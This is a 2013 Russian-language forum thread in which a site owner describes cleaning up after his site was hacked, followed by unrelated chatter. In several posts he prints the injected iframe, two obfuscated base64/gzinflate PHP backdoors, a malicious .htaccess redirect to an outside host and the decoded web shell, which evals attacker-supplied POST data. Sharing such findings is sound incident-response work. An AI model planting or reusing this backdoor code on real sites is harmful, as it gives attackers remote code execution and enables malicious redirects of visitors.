#881 2013.03.20 19:16

tipsun
Moderator
Зарегистрирован: 2009.10.14
Сообщений: 2277
Карма: 19
Профиль

Re: Скучно епт... [2]

Круто, мой сайт взломал хацкер smile
Не могу избавиться от вредоносного кода чет.

Код:

1
span style="color: #0000BB"><?php// Что я нашел лишнего у себя.//<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://dentazone.com/ozei.html?i=1238769></iframe>// Было в страницах// Еще 2 файла загружены оба с название default.php содержимое 1-ого в корне:eval(gzinflate(base64_decode("DZQ3EqtaAgX38qP3i0AgfE1NgBHee0imMBcPwl4Qq5+3gI5OnwYwH/80TzfXY36AP0W+A4r4XwXKbwX+/CNWLr4vd8pxInf+Or9ruLTWh1C0SHp+Xzfj8Aij13VNtGcpByyNLMu9GY4FRXrAUb6r2aRRrvWy2brWFf2a1JUmSLxi22IzyLuRVPEGIf/VfdRsb50BCIMLpdVuCh21eqqHlxFUk+XLA+XC1JTaGVf4JnHmlYz2vaC3fbybF2WYjdL3eIgWlmmriKhUi13cI+qO2OldJmkoxc7I57MvLr7tac4GMsBOS1vxmqOGVY4hfPxA6zYY7eYRj6a4PECFOqrED2d8hDWooWNGX7WFQToU/KCUoVUKfEfrj/J4Js4nHYa2H7xaL0coTbljAc4J0Rcqb8n6cZbkTxjlVeHPltTuG30+SchedxmHyN4MaBfaXHQaucxnl9HZj5JVZvxJByLg41LhcGNCJzw4bfoR3oB2/ZtUvn71VrfjNQnjdmZPt6akzyRME4w+btxg3nxXaBpq4eeqss/vQtbW/OAE5MLEi8tAPlQK5adUMQTq7uPyI7Xv7keB5uO8ZM9gNqegw5Fy90IxKBZ0MWqdBu2ieVg/WB13vB7tJ9tl2CRA70YD1zPVkvJO7md0RwDwUdfp8m2nN0ivT4C9kdNblKxXkYOmP1OIq57V+Nz5pgnMkGIV3K680z9oVOnSnTIG65p8P9Rv14vmCsYRJ1WGDsXrFBlvziW2EPhs5KvTvl0r+tjvwmZeE98hG6E+nRngJ2nt5pD28lSw2Uoh1HnyR41f0Fdkx3ypw+MhOAgXeX3wEUrxvhUUrBh939yAOdxnlUoq/UwVPUTBZjRGRdlpliPfmvExyAvTWFGOJkgFBmwLo1tlyNbuOsOp8eyZo3d9R3aSZqSo1VqWAfMdTYzANba7FVcC67Iycz2J1RN4zPveXeoFgik5vm+MTxWhQNHcVmYsAFHsHZWjbLioiWSqvZNpMlJ0tUO1cyVzNsxJSjJdKYi/mIx4yObKye8FM5vzy/I1OUaU8nvRbfKdfTYg/T0VwI50iMF9jN/57/rhI+IdtyS1ARm10XiFdejv8UzIzuElCLTRh7kuRY0/LoX+fK3Sg1TZGkTOEo1P98P7l6ClHuhIBiqER3HfmMxHpgYJTkkU8Sy2PIrElqu7SgOzd2LPo+kt/21AHy17EcpPNxi9VgbHNPGfW2ZJQ/1JV/JmM+XO4hj4j6yR253svbYkvdpnQykT6Itm6m/skX4A0lHsOXZl/G4EfZJDG97FjEBFYKC4WJfWwlKae+xblPaOHVHDz/tDImIp9wugWYpnRSV/cvsvzRUfnfDMBgTNmWNAuHFHXRmTUDT//AipY2FYS75uWmfdXKjmmuszqW/HJFnD3Q1nT2zBMS0WiJKen/F98E/9ujNn1cd5k1W8VUXxlvQEdBaQKoAGBU2DWIN0HGS8ohCNjU+tC6YJZmnyzNq9FD5xSH99PJIp+73TRF1zUYZKSY3zGdJxhdWJZMR5g0reYLlSv/ZH4FzEzGsrcmpvud3z1/GC69eBtPYg+5OEmnoJ1ULfvh1Dj48Y7w6FEQLiTsbdRXGVHHJ1XXh9WYmP01+PFVOEWQg2Q2IyI+OEg42VdWh0RpHamhHH+DjNV45X/50tuM5pvyXEHFbmtv1mPSkTpFx8Q8loQe8cFe4izBhKqr37KfMRGfQKxOt5fZTaoWkWgc78sK/XVf73n3///fc//wc=")));// Содержимое 2-ого в папке "/lib/":eval(gzinflate(base64_decode("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"))); ?>

Вложения

Неактивен

#882 2013.03.20 20:08

Gemorroj
Administrator
Откуда: Белоруссия
Зарегистрирован: 2007.11.03
Сообщений: 6594
Карма: 107
Профиль Веб-сайт

Re: Скучно епт... [2]

почему не можешь?

Неактивен

#883 2013.03.20 20:09

tipsun
Moderator
Зарегистрирован: 2009.10.14
Сообщений: 2277
Карма: 19
Профиль

Re: Скучно епт... [2]

Gemorroj, ну и пошалил он там. Теперь с адреса http://tipsun.h2m.ru/design/default.css идет redirect на http://habboigratis.altervista.org/ohmi.html?h=1238769.
Именно с главной страницы идет редирект.
Т.е. если я уберу "<link rel="stylesheet" type="text/css" href="design/default.css" />", то все нормально. А если оставлю, то сразу редирект.
При прямом доступе выходит моя таблица стилей.
Добавлено спустя   3 минуты  29 секунд:
Выложил оригинал, как было до удаления хацкера следов.
Добавлено спустя   7 минут  4 секунды:
Именно в этот момент резюме вывесил на avito и еще одном (гугл в помощь) и там указал свой сайт. А там с хрома и наверное у всех, у кого есть антивирус, выдало предупреждение. Теперь мне точно никто не напишет sad ПИчаль, тоска.

Неактивен

#884 2013.03.20 20:26

tipsun
Moderator
Зарегистрирован: 2009.10.14
Сообщений: 2277
Карма: 19
Профиль

Re: Скучно епт... [2]

Нашел, .htaccess файл в корне лежал. Удалил.
С тотал коммандера файл .htaccess не отображался. Через h2m файловый менеджер заметил.


<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^[a-z0-9]{1,4}[.](htm|pdf|jar) default.php [L]
</IfModule>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
RewriteRule ^.*$ http://habboigratis.altervista.org/ohmi.html?h=1238769 [L,R]
</IfModule>

Добавлено спустя   7 минут  52 секунды:
Вроде граб не дырявый. А вот насчет остальных скриптов, которые у меня там были фиг знает. Я там что только не держал.

Неактивен

#885 2013.03.20 21:23

tipsun
Moderator
Зарегистрирован: 2009.10.14
Сообщений: 2277
Карма: 19
Профиль

Re: Скучно епт... [2]

Вот что было спрятано в base64:

Код:

1
span style="color: #0000BB"><?php@error_reporting(0);@ini_set("display_errors",0);@ini_set("log_errors",0);@ini_set("error_log",0);if (isset($_GET['r'])) { print $_GET['r'];} elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));} elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); }}exit;

Неактивен

#886 2013.04.06 10:39

tipsun
Moderator
Зарегистрирован: 2009.10.14
Сообщений: 2277
Карма: 19
Профиль

Re: Скучно епт... [2]

Windows 8 радует всякими мелкими мобильными приложениями smile
Не все конечно отличного качества.

Неактивен

#887 2013.04.06 16:36

tipsun
Moderator
Зарегистрирован: 2009.10.14
Сообщений: 2277
Карма: 19
Профиль

Re: Скучно епт... [2]

Android apps можно запускать при помощи программы: http://www.bluestacks.com/

Неактивен

#888 2013.04.07 15:57

semmit69
Участник
Откуда: N
Зарегистрирован: 2011.01.22
Сообщений: 387
Карма: -4
Профиль

Re: Скучно епт... [2]

tipsun написал:

Android apps можно запускать при помощи программы: http://www.bluestacks.com/

0_о надо будет запомнить..

Неактивен

#889 2013.04.15 18:33

semmit69_guest
Гость

Re: Скучно епт... [2]

http://www.youtube.com/watch?v=ASO_zypdnsQ - типа поржать, psy. big_smile

#890 2013.04.20 13:14

tipsun
Moderator
Зарегистрирован: 2009.10.14
Сообщений: 2277
Карма: 19
Профиль

Re: Скучно епт... [2]

На mail.com можно зарегать почтовый ящик с хорощим @адресом. Их там около 200.
Примеры:


@mail.com,
@email.com,
@workmail.com,
@programmer.com

Неактивен

Дополнительно

forum.wapinet.ru

PunBB Mod v0.6.2
0.026 s